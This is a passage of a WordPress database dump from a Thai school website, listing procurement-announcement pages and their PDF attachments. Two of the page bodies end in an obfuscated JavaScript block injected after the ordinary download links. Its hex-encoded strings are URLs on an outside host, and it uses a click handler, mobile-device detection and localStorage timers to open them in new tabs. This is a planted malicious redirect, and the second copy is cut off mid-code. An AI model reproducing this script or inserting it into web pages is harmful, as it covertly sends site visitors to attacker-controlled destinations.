wp-element-button\" download aria-describedby=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86-%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%81%e0%b8%b2','','','2024-08-23 14:39:10','2024-08-23 07:39:10','',0,'http://pakhaeng.ssk.in.th/?page_id=1059',0,'page','',0),
(1060,1,'2024-08-23 14:30:39','2024-08-23 07:30:39','','ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80','','','2024-08-23 14:30:39','2024-08-23 07:30:39','',1059,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf',0,'attachment','application/pdf',0),
(1061,1,'2024-08-23 14:31:22','2024-08-23 07:31:22','','ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b8%a3%e0%b8%b2%e0%b8%84','','','2024-08-23 14:31:22','2024-08-23 07:31:22','',1059,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf',0,'attachment','application/pdf',0),
(1062,1,'2024-08-23 14:32:43','2024-08-23 07:32:43','','ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b8%a3%e0%b8%b2%e0%b8%84-2','','','2024-08-23 14:32:43','2024-08-23 07:32:43','',1059,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf',0,'attachment','application/pdf',0),
(1063,1,'2024-08-23 14:33:14','2024-08-23 07:33:14','<!-- wp:file {\"id\":1060,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศประกาศผู้ชนะการเสนอราคา ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-258d47a4-e670-467f-ad74-d5da4b3921dc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1061,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา ซื้อหนังสือเรียนฟรี โดยวิธีเฉพาะเจาะจง</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b77f476c-3294-419a-b3c9-e37849ddba91\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1062,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\",\"displayPreview\":false,\"backgroundColor\":\"white\"} -->\n<div class=\"wp-block-file has-white-background-color has-background\"><a id=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\">ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 